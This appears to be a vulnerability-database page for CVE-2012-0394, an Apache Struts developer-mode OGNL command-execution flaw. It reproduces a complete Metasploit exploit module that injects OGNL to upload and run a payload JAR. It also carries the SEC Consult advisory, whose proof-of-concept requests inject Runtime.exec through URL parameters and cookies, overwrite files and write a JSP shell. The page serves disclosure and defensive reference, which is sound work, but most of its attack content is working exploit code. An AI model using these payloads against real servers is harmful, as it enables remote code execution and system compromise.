CVE-2012-0394 : Detail

CVE-2012-0394

Code Injection
A03-Injection
94.42%V3
Network
2012-01-08
14h00 +00:00
2014-02-10
21h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-94 Improper Control of Generation of Code ('Code Injection')
The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 31434

Publication date : 2014-02-04 23h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Apache Struts Developer Mode OGNL Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in Apache Struts 2. The problem exists on applications running in developer mode, where the DebuggingInterceptor allows evaluation and execution of OGNL expressions, which allows remote attackers to execute arbitrary Java code. This module has been tested successfully in Struts 2.3.16, Tomcat 7 and Ubuntu 10.04. }, 'Author' => [ 'Johannes Dahse', # Vulnerability discovery and PoC 'Andreas Nusser', # Vulnerability discovery and PoC 'Alvaro', # @pwntester, 2014's PoC, avoided surname because of the spanish char, sorry about that :\ 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-0394'], [ 'OSVDB', '78276'], [ 'EDB', '18329'], [ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt' ], [ 'URL', 'http://www.pwntester.com/blog/2014/01/21/struts-2-devmode/' ] ], 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Struts 2', { } ] ], 'DisclosureDate' => 'Jan 06 2012', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]) ], self.class) end def check vprint_status("Testing to see if the target can evaluate our Java code...") addend_one = rand_text_numeric(rand(3) + 1).to_i addend_two = rand_text_numeric(rand(3) + 1).to_i sum = addend_one + addend_two res = execute_command("new java.lang.Integer(#{addend_one}+#{addend_two})") if res and res.code == 200 and res.body.to_i == sum return Exploit::CheckCode::Vulnerable end if res and res.code == 200 and res.body.to_s =~ /#{sum}/ vprint_status("Code got evaluated. Target seems vulnerable, but the response contains something else:") vprint_line(res.body.to_s) return Exploit::CheckCode::Appears end return CheckCode::Safe end def exploit @payload_jar = rand_text_alphanumeric(4+rand(4)) + ".jar" upload_jar execute_jar end def upload_jar append = 'false' jar = payload.encoded_jar.pack chunk_length = 384 # 512 bytes when base64 encoded while(jar.length > chunk_length) java_upload_part(jar[0, chunk_length], @payload_jar, append) jar = jar[chunk_length, jar.length - chunk_length] append='true' end java_upload_part(jar, @payload_jar, append) end def java_upload_part(part, filename, append = 'false') cmd = "#f=new java.io.FileOutputStream('#{filename}',#{append})," cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," cmd << "#f.close()" execute_command(cmd) end def execute_jar cmd = "" # disable Vararg handling (since it is buggy in OGNL used by Struts 2.1 cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," cmd << "#q.setAccessible(true),#q.set(null,true)," cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," cmd << "#q.setAccessible(true),#q.set(null,false)," # create classloader cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_jar}').toURI().toURL()})," # load class cmd << "#c=#cl.loadClass('metasploit.Payload')," # invoke main method cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" execute_command(cmd) end def execute_command(cmd) injection = "#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#f.setAccessible(true),#f.set(#_memberAccess,true),CMD" injection.gsub!(/CMD/, cmd) vprint_status("Attempting to execute: #{cmd}") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s), 'method' => 'GET', 'vars_get' => { 'debug' => 'command', 'expression' => injection } }) return res end end
Exploit Database EDB-ID : 18329

Publication date : 2012-01-05 23h00 +00:00
Author : SEC Consult
EDB Verified : Yes

SEC Consult Vulnerability Lab Security Advisory < 20120104-0 > ======================================================================= title: Multiple critical vulnerabilities in Apache Struts2 product: Apache Struts2 * OpenSymphony XWork * OpenSymphony OGNL vulnerable version: 2.3.1 and below fixed version: 2.3.1.1 impact: critical homepage: http://struts.apache.org/ found: 2011-11-18 by: Johannes Dahse, Andreas Nusser SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- Apache Struts2 is a web framework for creating Java web applications. It is using the OpenSymphony XWork and OGNL libraries. By default, XWork's ParametersInterceptor treats parameter names provided to actions as OGNL expressions. A OGNL (Object Graph Navigation Language) expression is a limited language similar to Java that is tokenized and parsed by the OGNL parser which invokes appropiate Java methods. This allows e.g. convenient access to properties that have a getter/setter method implemented. By providing a parameter like "product.id=1" the OGNL parser will call the appropiate setter getProduct().setId(1) in the current action context. OGNL is also able to call arbitrary methods, constructors and access context variables. For more details please refer to http://commons.apache.org/ognl/language-guide.html. Vulnerability overview/description: ----------------------------------- To prevent attackers calling arbitrary methods within parameters the flag "xwork.MethodAccessor.denyMethodExecution" is set to "true" and the SecurityMemberAccess field "allowStaticMethodAccess" is set to "false" by default. Also, to prevent access to context variables an improved character whitelist for paramteter names is applied in XWork's ParametersInterceptor since Struts 2.2.1.1: acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[\\(\\)_'\\s]+"; Under certain circumstances these restrictions can be bypassed to execute malicious Java code. 1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator) When an exception occurs while applying parameter values to properties the value is evaluated as OGNL expression. For example this occurs when setting a string value to a property with type integer. Since the values are not filtered an attacker can abuse the power of the OGNL language to execute arbitrary Java code leading to remote command execution. This issue has been reported (https://issues.apache.org/jira/browse/WW-3668) and was fixed in Struts 2.2.3.1. However the ability to execute arbitrary Java code has been overlooked. 2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor) The character whitelist for parameter names is not applied to Struts CookieInterceptor. When Struts is configured to handle cookie names, an attacker can execute arbitrary system commands with static method access to Java functions. Therefore the flag "allowStaticMethodAccess" can be set to true within the request. 3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor) Accessing the flag "allowStaticMethodAccess" within parameters is prohibited since Struts 2.2.3.1. An attacker can still access public constructors with only one parameter of type String to create new Java objects and access their setters with only one parameter of type String. This can be abused for example to create and overwrite arbitrary files. To inject forbidden characters to the filename an uninitialized string property can be used. 4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor) While not being a security vulnerability itself, please note that applications running in developer mode and using Struts DebuggingInterceptor are prone to remote command execution as well. While applications should never run in developer mode during production, developers should be aware that doing so not only has performance issues (as documented) but also a critical security impact. Proof of concept: ----------------- 1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator) Given Test.java has an property "id" of type Integer or Long and appropriate getter and setter methods: long id; Given test.jsp with result name=input is configured for action "Test": struts.xml: <action name="Test" class="example.Test"> <result name="input">test.jsp</result> </action> The following request will trigger an exception, the value will be evaluated as OGNL expression and arbitrary Java code can be executed: /Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b' An attacker can also overwrite flags that will allow direct OS command execution: /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b' If test.jsp displays the property "id" the result of the Java code evaluation can be accessed: <%@ taglib prefix="s" uri="/struts-tags" %> <s:property value="id" /> 2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor) Given struts.xml is configured to handle all cookie names (independent of limited cookie values): <action name="Test" class="example.Test"> <interceptor-ref name="cookie"> <param name="cookiesName">*</param> <param name="cookiesValue">1,2</param> </interceptor-ref> <result ...> </action> The following HTTP header will execute an OS command when sent to Test.action: Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1 3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor) Given Test.java has an uninitialized property "name" of type String: String name; // +getter+setter The following request will create/overwrite the file "C:/sec-consult.txt" (empty file): /Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1 The existence of the property 'x' used in these examples is of no importance. 4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor) Given struts.xml is configured to run in developer mode and to use the debugging interceptor: <constant name="struts.devMode" value="true" /> <action name="Test" class="example.Test"> <interceptor-ref name="debugging" /> <result ...> </action> The following request will execute arbitrary OGNL expressions leading to remote command execution: /Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc') Vulnerable / tested versions: ----------------------------- All products using Struts2 are affected by at least one critical vulnerability listed above! Proof of Concept 1.) has been tested with Jetty-6.1.25 26 July 2010 and Struts 2.2.1.1 Proof of Concepts 2.), 3.) and 4.) have been tested with Jetty-6.1.25 26 July 2010 and Struts 2.2.1.1, 2.2.3.1 and 2.3.1 Vendor contact timeline: ------------------------ 2011-12-14: Contacting vendor through security at struts dot apache dot org 2011-12-14: Vendor reply, sending advisory draft 2011-12-14: Vendor released Apache Struts 2.3.1 in parallel 2011-12-16: Vulnerabilities confirmed in Struts 2.3.1, Vendor contacted 2011-12-16: Vendor reply, discussing workaround 2011-12-20: Discussing release of fixed version 2011-12-21: Providing additional information 2012-01-03: Vendor informs that update is ready 2012-01-03: Patch (2.3.1.1) is available Solution: --------- Update to Struts 2.3.1.1 Workaround: ----------- Update to Struts 2.3.1 and apply a stronger acceptedParamNames filter to the Parameters- and CookieInterceptor: acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[_']+"; Don't run your applications in developer mode. Advisory URL: ------------- https://www.sec-consult.com/en/advisories.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com EOF J. Dahse, A. Nusser / 2012

Products Mentioned

Configuraton 0

Apache>>Struts >> Version From (including) 2.0.0 To (including) 2.3.17

References

http://www.exploit-db.com/exploits/18329
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.exploit-db.com/exploits/31434
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.osvdb.org/78276
Tags : vdb-entry, x_refsource_OSVDB